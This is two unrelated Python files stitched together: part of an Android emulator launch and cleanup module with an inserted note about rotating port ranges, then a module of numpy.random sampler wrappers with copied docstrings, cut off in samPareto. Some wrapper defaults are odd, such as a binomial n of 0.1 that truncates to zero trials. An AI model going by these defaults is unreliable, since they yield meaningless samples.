new_ini.write('avd.ini.encoding=ISO-8859-1\n')
new_ini.write('target=%s\n' % api_target)
new_ini.write('path=%s/%s.avd\n' % (avds_dir, self.avd_name))
new_ini.write('path.rel=avd/%s.avd\n' % self.avd_name)
custom_config = CONFIG_TEMPLATE
replacements = CONFIG_REPLACEMENTS[self.abi]
for key in replacements:
custom_config = custom_config.replace(key, replacements[key])
custom_config = custom_config.replace('{api.level}', str(api_level))
with open(new_config_ini, 'w') as new_config:
new_config.write(custom_config)
return self.avd_name
def _DeleteAVD(self):
"""Delete the AVD of this emulator."""
avd_command = [
self.android,
'--silent',
'delete',
'avd',
'--name', self.avd_name,
]
logging.info('Delete AVD command: %s', ' '.join(avd_command))
cmd_helper.RunCmd(avd_command)
def Launch(self, kill_all_emulators):
"""Launches the emulator asynchronously. Call ConfirmLaunch() to ensure the
emulator is ready for use.
If it fails, an exception will be raised.
"""
if kill_all_emulators:
_KillAllEmulators() # just to be sure
self._AggressiveImageCleanup()
(self.device_serial, port) = self._DeviceName()
emulator_command = [
self.emulator,
# Speed up emulator launch by 40%. Really.
'-no-boot-anim',
# The default /data size is 64M.
# That's not enough for 8 unit test bundles and their data.
'-partition-size', '512',
# Use a familiar name and port.
'-avd', self.avd_name,
'-port', str(port),
# Wipe the data. We've seen cases where an emulator gets 'stuck' if we
# don't do this (every thousand runs or so).
'-wipe-data',
# Enable GPU by default.
'-gpu', 'on',
'-qemu', '-m', '1024',
]
if self.abi == 'x86':
emulator_command.extend([
# For x86 emulator --enable-kvm will fail early, avoiding accidental
# runs in a slow mode (i.e. without hardware virtualization support).
'--enable-kvm',
])
logging.info('Emulator launch command: %s', ' '.join(emulator_command))
self.popen = subprocess.Popen(args=emulator_command,
stderr=subprocess.STDOUT)
self._InstallKillHandler()
@staticmethod
def _AggressiveImageCleanup():
"""Aggressive cleanup of emulator images.
Experimentally it looks like our current emulator use on the bot
leaves image files around in /tmp/android-$USER. If a "random"
name gets reused, we choke with a 'File exists' error.
TODO(jrg): is there a less hacky way to accomplish the same goal?
"""
logging.info('Aggressive Image Cleanup')
emulator_imagedir = '/tmp/android-%s' % os.environ['USER']
if not os.path.exists(emulator_imagedir):
return
for image in os.listdir(emulator_imagedir):
full_name = os.path.join(emulator_imagedir, image)
if 'emulator' in full_name:
logging.info('Deleting emulator image %s', full_name)
os.unlink(full_name)
def ConfirmLaunch(self, wait_for_boot=False):
"""Confirm the emulator launched properly.
Loop on a wait-for-device with a very small timeout. On each
timeout, check the emulator process is still alive.
After confirming a wait-for-device can be successful, make sure
it returns the right answer.
"""
seconds_waited = 0
number_of_waits = 2 # Make sure we can wfd twice
# TODO(jbudorick) Un-handroll this in the implementation switch.
adb_cmd = "adb -s %s %s" % (self.device_serial, 'wait-for-device')
while seconds_waited < self._LAUNCH_TIMEOUT:
try:
run_command.RunCommand(adb_cmd,
timeout_time=self._WAITFORDEVICE_TIMEOUT,
retry_count=1)
number_of_waits -= 1
if not number_of_waits:
break
except errors.WaitForResponseTimedOutError:
seconds_waited += self._WAITFORDEVICE_TIMEOUT
adb_cmd = "adb -s %s %s" % (self.device_serial, 'kill-server')
run_command.RunCommand(adb_cmd)
self.popen.poll()
if self.popen.returncode is not None:
raise EmulatorLaunchException('EMULATOR DIED')
if seconds_waited >= self._LAUNCH_TIMEOUT:
raise EmulatorLaunchException('TIMEOUT with wait-for-device')
logging.info('Seconds waited on wait-for-device: %d', seconds_waited)
if wait_for_boot:
# Now that we checked for obvious problems, wait for a boot complete.
# Waiting for the package manager is sometimes problematic.
# TODO(jbudorick) Convert this once waiting for the package manager and
# the external storage is no longer problematic.
d = device_utils.DeviceUtils(self.device_serial)
d.old_interface.WaitForSystemBootCompleted(self._WAITFORBOOT_TIMEOUT)
def Shutdown(self):
"""Shuts down the process started by launch."""
self._DeleteAVD()
if self.popen:
self.popen.poll()
if self.popen.returncode is None:
self.popen.kill()
self.popen = None
def _ShutdownOnSignal(self, _signum, _frame):
logging.critical('emulator _ShutdownOnSignal')
for sig in self._SIGNALS:
signal.signal(sig, signal.SIG_DFL)
self.Shutdown()
raise KeyboardInterrupt # print a stack
def _InstallKillHandler(self):
"""Install a handler to kill the emulator when we exit unexpectedly."""
for sig in self._SIGNALS:
signal.signal(sig, self._ShutdownOnSignal)
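The rotating start position in PortPool.port_range() is the key trick for dodging "sticky" ports: each call returns the same candidate set, but starting one position later, so a stuck port never blocks every relaunch. A standalone sketch of the same rotation, with illustrative names:

def rotating_ranges(lo=5554, hi=5585, step=2):
    # Yield the full port list on every call, rotated one step further each time.
    ports = list(range(lo, hi, step))
    n = 0
    while True:
        yield ports[n:] + ports[:n]
        n = (n + 1) % len(ports)

gen = rotating_ranges()
print(next(gen)[:3])   # [5554, 5556, 5558]
print(next(gen)[:3])   # [5556, 5558, 5560]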
|
appknox/xysec_adb
|
xysec_adb/pylib/utils/emulator.py
|
Python
|
apache-2.0
| 14,436
|
[
"Galaxy"
] |
fa68ed57b49f44ec70012b818c0dd1eb4a5f390e6b651259ddba0a293d8c5eec
|
# MIT License
#
# Copyright (c) 2016 Daily Actie
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Author: Quan Pan <quanpan302@hotmail.com>
# License: MIT License
# Create: 2016-12-02
import numpy.random as rand
def samRandom(n=2):
"""samRandom
:param n: default 2
:return: ndarray of ``n`` uniform random samples drawn from [0, 1).
.. note:: Not sphinx doc!! 20170214
Encoding: utf-8
module numpy.random.mtrand
from /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/numpy/random/mtrand.so
by generator 1.138
no doc
Links:
https://docs.scipy.org/doc/numpy/reference/routines.random.html
"""
return rand.rand(n)
def samBeta(a=0.1, b=0.1, size=None): # real signature unknown; restored from __doc__
"""beta(a, b, size=None)
Draw samples from a Beta distribution.
The Beta distribution is a special case of the Dirichlet distribution,
and is related to the Gamma distribution. It has the probability
distribution function
.. math:: f(x; a,b) = \frac{1}{B(\alpha, \beta)} x^{\alpha - 1}
(1 - x)^{\beta - 1},
where the normalisation, B, is the beta function,
.. math:: B(\alpha, \beta) = \int_0^1 t^{\alpha - 1}
(1 - t)^{\beta - 1} dt.
It is often seen in Bayesian inference and order statistics.
:param a: Alpha, non-negative
:type a: float
:param b: Beta, non-negative
:type b: float
:param size: Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
:type size: int or tuple of ints, optional
:returns: out, ndarray
Array of the given shape, containing values drawn from a
Beta distribution.
"""
return rand.beta(a=a, b=b, size=size)
def samBinomial(n=0.1, p=0.5, size=None): # real signature unknown; restored from __doc__
"""binomial(n, p, size=None)
Draw samples from a binomial distribution.
Samples are drawn from a binomial distribution with specified
parameters, n trials and p probability of success where
n an integer >= 0 and p is in the interval [0,1]. (n may be
input as a float, but it is truncated to an integer in use)
Parameters
----------
n : float (but truncated to an integer)
parameter, >= 0.
p : float
parameter, >= 0 and <=1.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
where the values are all integers in [0, n].
See Also
--------
scipy.stats.distributions.binom : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the binomial distribution is
.. math:: P(N) = \binom{n}{N}p^N(1-p)^{n-N},
where :math:`n` is the number of trials, :math:`p` is the probability
of success, and :math:`N` is the number of successes.
When estimating the standard error of a proportion in a population by
using a random sample, the normal distribution works well unless the
product p*n <=5, where p = population proportion estimate, and n =
number of samples, in which case the binomial distribution is used
instead. For example, a sample of 15 people shows 4 who are left
handed, and 11 who are right handed. Then p = 4/15 = 27%. 0.27*15 = 4,
so the binomial distribution should be used in this case.
References
----------
.. [1] Dalgaard, Peter, "Introductory Statistics with R",
Springer-Verlag, 2002.
.. [2] Glantz, Stanton A. "Primer of Biostatistics.", McGraw-Hill,
Fifth Edition, 2002.
.. [3] Lentner, Marvin, "Elementary Applied Statistics", Bogden
and Quigley, 1972.
.. [4] Weisstein, Eric W. "Binomial Distribution." From MathWorld--A
Wolfram Web Resource.
http://mathworld.wolfram.com/BinomialDistribution.html
.. [5] Wikipedia, "Binomial-distribution",
http://en.wikipedia.org/wiki/Binomial_distribution
Examples
--------
Draw samples from the distribution:
>>> n, p = 10, .5 # number of trials, probability of each trial
>>> s = np.random.binomial(n, p, 1000)
# result of flipping a coin 10 times, tested 1000 times.
A real world example. A company drills 9 wild-cat oil exploration
wells, each with an estimated probability of success of 0.1. All nine
wells fail. What is the probability of that happening?
Let's do 20,000 trials of the model, and count the number that
generate zero positive results.
>>> sum(np.random.binomial(9, 0.1, 20000) == 0)/20000.
# answer = 0.38885, or 38%.
"""
return rand.binomial(n=n, p=p, size=size)
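A quick sketch verifying the nine-dry-wells example in the docstring: the exact probability is 0.9**9, which the simulation approximates.

import numpy.random as rand

trials = rand.binomial(9, 0.1, 20000)
print((trials == 0).mean())  # ~0.387, close to the docstring's 0.38885
print(0.9 ** 9)              # 0.387420489, the exact value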
def samChiSquare(df=2, size=None): # real signature unknown; restored from __doc__
"""chisquare(df, size=None)
Draw samples from a chi-square distribution.
When `df` independent random variables, each with standard normal
distributions (mean 0, variance 1), are squared and summed, the
resulting distribution is chi-square (see Notes). This distribution
is often used in hypothesis testing.
Parameters
----------
df : int
Number of degrees of freedom.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
output : ndarray
Samples drawn from the distribution, packed in a `size`-shaped
array.
Raises
------
ValueError
When `df` <= 0 or when an inappropriate `size` (e.g. ``size=-1``)
is given.
Notes
-----
The variable obtained by summing the squares of `df` independent,
standard normally distributed random variables:
.. math:: Q = \sum_{i=0}^{\mathtt{df}} X^2_i
is chi-square distributed, denoted
.. math:: Q \sim \chi^2_k.
The probability density function of the chi-squared distribution is
.. math:: p(x) = \frac{(1/2)^{k/2}}{\Gamma(k/2)}
x^{k/2 - 1} e^{-x/2},
where :math:`\Gamma` is the gamma function,
.. math:: \Gamma(x) = \int_0^{\infty} t^{x - 1} e^{-t} dt.
References
----------
.. [1] NIST "Engineering Statistics Handbook"
http://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
Examples
--------
>>> np.random.chisquare(2,4)
array([ 1.89920014, 9.00867716, 3.13710533, 5.62318272])
"""
return rand.chisquare(df=df, size=size)
def samExponential(scale=1.0, size=None): # real signature unknown; restored from __doc__
"""exponential(scale=1.0, size=None)
Draw samples from an exponential distribution.
Its probability density function is
.. math:: f(x; \frac{1}{\beta}) = \frac{1}{\beta} \exp(-\frac{x}{\beta}),
for ``x > 0`` and 0 elsewhere. :math:`\beta` is the scale parameter,
which is the inverse of the rate parameter :math:`\lambda = 1/\beta`.
The rate parameter is an alternative, widely used parameterization
of the exponential distribution [3]_.
The exponential distribution is a continuous analogue of the
geometric distribution. It describes many common situations, such as
the size of raindrops measured over many rainstorms [1]_, or the time
between page requests to Wikipedia [2]_.
Parameters
----------
scale : float
The scale parameter, :math:`\beta = 1/\lambda`.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
References
----------
.. [1] Peyton Z. Peebles Jr., "Probability, Random Variables and
Random Signal Principles", 4th ed, 2001, p. 57.
.. [2] "Poisson Process", Wikipedia,
http://en.wikipedia.org/wiki/Poisson_process
.. [3] "Exponential Distribution, Wikipedia,
http://en.wikipedia.org/wiki/Exponential_distribution
"""
return rand.exponential(scale=scale, size=size)
def samF(dfnum=1, dfden=48, size=None): # real signature unknown; restored from __doc__
"""f(dfnum, dfden, size=None)
Draw samples from an F distribution.
Samples are drawn from an F distribution with specified parameters,
`dfnum` (degrees of freedom in numerator) and `dfden` (degrees of
freedom in denominator), where both parameters should be greater than
zero.
The random variate of the F distribution (also known as the
Fisher distribution) is a continuous probability distribution
that arises in ANOVA tests, and is the ratio of two chi-square
variates.
Parameters
----------
dfnum : float
Degrees of freedom in numerator. Should be greater than zero.
dfden : float
Degrees of freedom in denominator. Should be greater than zero.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
Samples from the Fisher distribution.
See Also
--------
scipy.stats.distributions.f : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The F statistic is used to compare in-group variances to between-group
variances. Calculating the distribution depends on the sampling, and
so it is a function of the respective degrees of freedom in the
problem. The variable `dfnum` is the number of groups minus one, the
between-groups degrees of freedom, while `dfden` is the within-groups
degrees of freedom, the sum of the number of samples in each group
minus the number of groups.
References
----------
.. [1] Glantz, Stanton A. "Primer of Biostatistics.", McGraw-Hill,
Fifth Edition, 2002.
.. [2] Wikipedia, "F-distribution",
http://en.wikipedia.org/wiki/F-distribution
Examples
--------
An example from Glantz[1], pp 47-40:
Two groups, children of diabetics (25 people) and children from people
without diabetes (25 controls). Fasting blood glucose was measured,
case group had a mean value of 86.1, controls had a mean value of
82.2. Standard deviations were 2.09 and 2.49 respectively. Are these
data consistent with the null hypothesis that the parents diabetic
status does not affect their children's blood glucose levels?
Calculating the F statistic from the data gives a value of 36.01.
Draw samples from the distribution:
>>> dfnum = 1. # between group degrees of freedom
>>> dfden = 48. # within groups degrees of freedom
>>> s = np.random.f(dfnum, dfden, 1000)
The lower bound for the top 1% of the samples is:
>>> np.sort(s)[-10]
7.61988120985
So there is about a 1% chance that the F statistic will exceed 7.62,
the measured value is 36, so the null hypothesis is rejected at the 1%
level.
"""
return rand.f(dfnum=dfnum, dfden=dfden, size=size)
def samGamma(shape=2.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""gamma(shape, scale=1.0, size=None)
Draw samples from a Gamma distribution.
Samples are drawn from a Gamma distribution with specified parameters,
`shape` (sometimes designated "k") and `scale` (sometimes designated
"theta"), where both parameters are > 0.
Parameters
----------
shape : scalar > 0
The shape of the gamma distribution.
scale : scalar > 0, optional
The scale of the gamma distribution. Default is equal to 1.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
out : ndarray, float
Returns one sample unless `size` parameter is specified.
See Also
--------
scipy.stats.distributions.gamma : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Gamma distribution is
.. math:: p(x) = x^{k-1}\frac{e^{-x/\theta}}{\theta^k\Gamma(k)},
where :math:`k` is the shape and :math:`\theta` the scale,
and :math:`\Gamma` is the Gamma function.
The Gamma distribution is often used to model the times to failure of
electronic components, and arises naturally in processes for which the
waiting times between Poisson distributed events are relevant.
References
----------
.. [1] Weisstein, Eric W. "Gamma Distribution." From MathWorld--A
Wolfram Web Resource.
http://mathworld.wolfram.com/GammaDistribution.html
.. [2] Wikipedia, "Gamma-distribution",
http://en.wikipedia.org/wiki/Gamma-distribution
Examples
--------
Draw samples from the distribution:
>>> shape, scale = 2., 2. # shape and scale
>>> s = np.random.gamma(shape, scale, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> import scipy.special as sps
>>> count, bins, ignored = plt.hist(s, 50, normed=True)
>>> y = bins**(shape-1)*(np.exp(-bins/scale) /
... (sps.gamma(shape)*scale**shape))
>>> plt.plot(bins, y, linewidth=2, color='r')
>>> plt.show()
"""
return rand.gamma(shape=shape, scale=scale, size=size)
def samGumbel(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""gumbel(loc=0.0, scale=1.0, size=None)
Draw samples from a Gumbel distribution.
Draw samples from a Gumbel distribution with specified location and
scale. For more information on the Gumbel distribution, see
Notes and References below.
Parameters
----------
loc : float
The location of the mode of the distribution.
scale : float
The scale parameter of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
See Also
--------
scipy.stats.gumbel_l
scipy.stats.gumbel_r
scipy.stats.genextreme
weibull
Notes
-----
The Gumbel (or Smallest Extreme Value (SEV) or the Smallest Extreme
Value Type I) distribution is one of a class of Generalized Extreme
Value (GEV) distributions used in modeling extreme value problems.
The Gumbel is a special case of the Extreme Value Type I distribution
for maximums from distributions with "exponential-like" tails.
The probability density for the Gumbel distribution is
.. math:: p(x) = \frac{e^{-(x - \mu)/ \beta}}{\beta} e^{ -e^{-(x - \mu)/
\beta}},
where :math:`\mu` is the mode, a location parameter, and
:math:`\beta` is the scale parameter.
The Gumbel (named for German mathematician Emil Julius Gumbel) was used
very early in the hydrology literature, for modeling the occurrence of
flood events. It is also used for modeling maximum wind speed and
rainfall rates. It is a "fat-tailed" distribution - the probability of
an event in the tail of the distribution is larger than if one used a
Gaussian, hence the surprisingly frequent occurrence of 100-year
floods. Floods were initially modeled as a Gaussian process, which
underestimated the frequency of extreme events.
It is one of a class of extreme value distributions, the Generalized
Extreme Value (GEV) distributions, which also includes the Weibull and
Frechet.
The function has a mean of :math:`\mu + 0.57721\beta` and a variance
of :math:`\frac{\pi^2}{6}\beta^2`.
References
----------
.. [1] Gumbel, E. J., "Statistics of Extremes,"
New York: Columbia University Press, 1958.
.. [2] Reiss, R.-D. and Thomas, M., "Statistical Analysis of Extreme
Values from Insurance, Finance, Hydrology and Other Fields,"
Basel: Birkhauser Verlag, 2001.
Examples
--------
Draw samples from the distribution:
>>> mu, beta = 0, 0.1 # location and scale
>>> s = np.random.gumbel(mu, beta, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> plt.plot(bins, (1/beta)*np.exp(-(bins - mu)/beta)
... * np.exp( -np.exp( -(bins - mu) /beta) ),
... linewidth=2, color='r')
>>> plt.show()
Show how an extreme value distribution can arise from a Gaussian process
and compare to a Gaussian:
>>> means = []
>>> maxima = []
>>> for i in range(0,1000) :
... a = np.random.normal(mu, beta, 1000)
... means.append(a.mean())
... maxima.append(a.max())
>>> count, bins, ignored = plt.hist(maxima, 30, normed=True)
>>> beta = np.std(maxima)*np.pi/np.sqrt(6)
>>> mu = np.mean(maxima) - 0.57721*beta
>>> plt.plot(bins, (1/beta)*np.exp(-(bins - mu)/beta)
... * np.exp(-np.exp(-(bins - mu)/beta)),
... linewidth=2, color='r')
>>> plt.plot(bins, 1/(beta * np.sqrt(2 * np.pi))
... * np.exp(-(bins - mu)**2 / (2 * beta**2)),
... linewidth=2, color='g')
>>> plt.show()
"""
return rand.gumbel(loc=loc, scale=scale, size=size)
def samLaplace(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""laplace(loc=0.0, scale=1.0, size=None)
Draw samples from the Laplace or double exponential distribution with
specified location (or mean) and scale (decay).
The Laplace distribution is similar to the Gaussian/normal distribution,
but is sharper at the peak and has fatter tails. It represents the
difference between two independent, identically distributed exponential
random variables.
Parameters
----------
loc : float, optional
The position, :math:`\mu`, of the distribution peak.
scale : float, optional
:math:`\lambda`, the exponential decay.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or float
Notes
-----
It has the probability density function
.. math:: f(x; \mu, \lambda) = \frac{1}{2\lambda}
\exp\left(-\frac{|x - \mu|}{\lambda}\right).
The first law of Laplace, from 1774, states that the frequency
of an error can be expressed as an exponential function of the
absolute magnitude of the error, which leads to the Laplace
distribution. For many problems in economics and health
sciences, this distribution seems to model the data better
than the standard Gaussian distribution.
References
----------
.. [1] Abramowitz, M. and Stegun, I. A. (Eds.). "Handbook of
Mathematical Functions with Formulas, Graphs, and Mathematical
Tables, 9th printing," New York: Dover, 1972.
.. [2] Kotz, Samuel, et. al. "The Laplace Distribution and
Generalizations, " Birkhauser, 2001.
.. [3] Weisstein, Eric W. "Laplace Distribution."
From MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/LaplaceDistribution.html
.. [4] Wikipedia, "Laplace Distribution",
http://en.wikipedia.org/wiki/Laplace_distribution
Examples
--------
Draw samples from the distribution
>>> loc, scale = 0., 1.
>>> s = np.random.laplace(loc, scale, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> x = np.arange(-8., 8., .01)
>>> pdf = np.exp(-abs(x-loc)/scale)/(2.*scale)
>>> plt.plot(x, pdf)
Plot Gaussian for comparison:
>>> g = (1/(scale * np.sqrt(2 * np.pi)) *
... np.exp(-(x - loc)**2 / (2 * scale**2)))
>>> plt.plot(x,g)
"""
return rand.laplace(loc=loc, scale=scale, size=size)
def samLogistic(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""logistic(loc=0.0, scale=1.0, size=None)
Draw samples from a logistic distribution.
Samples are drawn from a logistic distribution with specified
parameters, loc (location or mean, also median), and scale (>0).
Parameters
----------
loc : float
scale : float > 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
Drawn samples from the logistic distribution.
See Also
--------
scipy.stats.distributions.logistic : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Logistic distribution is
.. math:: P(x) = \frac{e^{-(x-\mu)/s}}{s(1+e^{-(x-\mu)/s})^2},
where :math:`\mu` = location and :math:`s` = scale.
The Logistic distribution is used in Extreme Value problems where it
can act as a mixture of Gumbel distributions, in Epidemiology, and by
the World Chess Federation (FIDE) where it is used in the Elo ranking
system, assuming the performance of each player is a logistically
distributed random variable.
References
----------
.. [1] Reiss, R.-D. and Thomas M. (2001), "Statistical Analysis of
Extreme Values, from Insurance, Finance, Hydrology and Other
Fields," Birkhauser Verlag, Basel, pp 132-133.
.. [2] Weisstein, Eric W. "Logistic Distribution." From
MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/LogisticDistribution.html
.. [3] Wikipedia, "Logistic-distribution",
http://en.wikipedia.org/wiki/Logistic_distribution
Examples
--------
Draw samples from the distribution:
>>> loc, scale = 10, 1
>>> s = np.random.logistic(loc, scale, 10000)
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, bins=50)
# plot against distribution
>>> def logist(x, loc, scale):
... return np.exp((loc-x)/scale)/(scale*(1+np.exp((loc-x)/scale))**2)
>>> plt.plot(bins, logist(bins, loc, scale)*count.max()/\
... logist(bins, loc, scale).max())
>>> plt.show()
"""
return rand.logistic(loc=loc, scale=scale, size=size)
def samLognormal(mean=0.0, sigma=1.0, size=None): # real signature unknown; restored from __doc__
"""lognormal(mean=0.0, sigma=1.0, size=None)
Draw samples from a log-normal distribution.
Draw samples from a log-normal distribution with specified mean,
standard deviation, and array shape. Note that the mean and standard
deviation are not the values for the distribution itself, but of the
underlying normal distribution it is derived from.
Parameters
----------
mean : float
Mean value of the underlying normal distribution
sigma : float, > 0.
Standard deviation of the underlying normal distribution
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or float
The desired samples. An array of the same shape as `size` if given,
if `size` is None a float is returned.
See Also
--------
scipy.stats.lognorm : probability density function, distribution,
cumulative density function, etc.
Notes
-----
A variable `x` has a log-normal distribution if `log(x)` is normally
distributed. The probability density function for the log-normal
distribution is:
.. math:: p(x) = \frac{1}{\sigma x \sqrt{2\pi}}
e^{(-\frac{(ln(x)-\mu)^2}{2\sigma^2})}
where :math:`\mu` is the mean and :math:`\sigma` is the standard
deviation of the normally distributed logarithm of the variable.
A log-normal distribution results if a random variable is the *product*
of a large number of independent, identically-distributed variables in
the same way that a normal distribution results if the variable is the
*sum* of a large number of independent, identically-distributed
variables.
References
----------
.. [1] Limpert, E., Stahel, W. A., and Abbt, M., "Log-normal
Distributions across the Sciences: Keys and Clues,"
BioScience, Vol. 51, No. 5, May, 2001.
http://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
.. [2] Reiss, R.D. and Thomas, M., "Statistical Analysis of Extreme
Values," Basel: Birkhauser Verlag, 2001, pp. 31-32.
Examples
--------
Draw samples from the distribution:
>>> mu, sigma = 3., 1. # mean and standard deviation
>>> s = np.random.lognormal(mu, sigma, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 100, normed=True, align='mid')
>>> x = np.linspace(min(bins), max(bins), 10000)
>>> pdf = (np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))
... / (x * sigma * np.sqrt(2 * np.pi)))
>>> plt.plot(x, pdf, linewidth=2, color='r')
>>> plt.axis('tight')
>>> plt.show()
Demonstrate that taking the products of random samples from a uniform
distribution can be fit well by a log-normal probability density
function.
>>> # Generate a thousand samples: each is the product of 100 random
>>> # values, drawn from a uniform distribution.
>>> b = []
>>> for i in range(1000):
... a = 10. + np.random.random(100)
... b.append(np.product(a))
>>> b = np.array(b) / np.min(b) # scale values to be positive
>>> count, bins, ignored = plt.hist(b, 100, normed=True, align='mid')
>>> sigma = np.std(np.log(b))
>>> mu = np.mean(np.log(b))
>>> x = np.linspace(min(bins), max(bins), 10000)
>>> pdf = (np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))
... / (x * sigma * np.sqrt(2 * np.pi)))
>>> plt.plot(x, pdf, color='r', linewidth=2)
>>> plt.show()
"""
return rand.lognormal(mean=mean, sigma=sigma, size=size)
def samNormal(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""normal(loc=0.0, scale=1.0, size=None)
Draw random samples from a normal (Gaussian) distribution.
The probability density function of the normal distribution, first
derived by De Moivre and 200 years later by both Gauss and Laplace
independently [2]_, is often called the bell curve because of
its characteristic shape (see the example below).
The normal distributions occurs often in nature. For example, it
describes the commonly occurring distribution of samples influenced
by a large number of tiny, random disturbances, each with its own
unique distribution [2]_.
Parameters
----------
loc : float
Mean ("centre") of the distribution.
scale : float
Standard deviation (spread or "width") of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
See Also
--------
scipy.stats.distributions.norm : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Gaussian distribution is
.. math:: p(x) = \frac{1}{\sqrt{ 2 \pi \sigma^2 }}
e^{ - \frac{ (x - \mu)^2 } {2 \sigma^2} },
where :math:`\mu` is the mean and :math:`\sigma` the standard
deviation. The square of the standard deviation, :math:`\sigma^2`,
is called the variance.
The function has its peak at the mean, and its "spread" increases with
the standard deviation (the function reaches 0.607 times its maximum at
:math:`\mu + \sigma` and :math:`\mu - \sigma` [2]_). This implies that
`numpy.random.normal` is more likely to return samples lying close to
the mean, rather than those far away.
References
----------
.. [1] Wikipedia, "Normal distribution",
http://en.wikipedia.org/wiki/Normal_distribution
.. [2] P. R. Peebles Jr., "Central Limit Theorem" in "Probability,
Random Variables and Random Signal Principles", 4th ed., 2001,
pp. 51, 125.
Examples
--------
Draw samples from the distribution:
>>> mu, sigma = 0, 0.1 # mean and standard deviation
>>> s = np.random.normal(mu, sigma, 1000)
Verify the mean and the variance:
>>> abs(mu - np.mean(s)) < 0.01
True
>>> abs(sigma - np.std(s, ddof=1)) < 0.01
True
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) *
... np.exp( - (bins - mu)**2 / (2 * sigma**2) ),
... linewidth=2, color='r')
>>> plt.show()
"""
return rand.normal(loc=loc, scale=scale, size=size)
def samPareto(a=3.0, size=None): # real signature unknown; restored from __doc__
"""pareto(a, size=None)
Draw samples from a Pareto II or Lomax distribution with
specified shape.
The Lomax or Pareto II distribution is a shifted Pareto
distribution. The classical Pareto distribution can be
obtained from the Lomax distribution by adding 1 and
multiplying by the scale parameter ``m`` (see Notes). The
smallest value of the Lomax distribution is zero while for the
classical Pareto distribution it is ``mu``, where the standard
Pareto distribution has location ``mu = 1``. Lomax can also
be considered as a simplified version of the Generalized
Pareto distribution (available in SciPy), with the scale set
to one and the location set to zero.
The Pareto distribution must be greater than zero, and is
unbounded above. It is also known as the "80-20 rule". In
this distribution, 80 percent of the weights are in the lowest
20 percent of the range, while the other 20 percent fill the
remaining 80 percent of the range.
Parameters
----------
a : float, > 0.
Shape of the distribution.
size : int or tuple of ints, optional
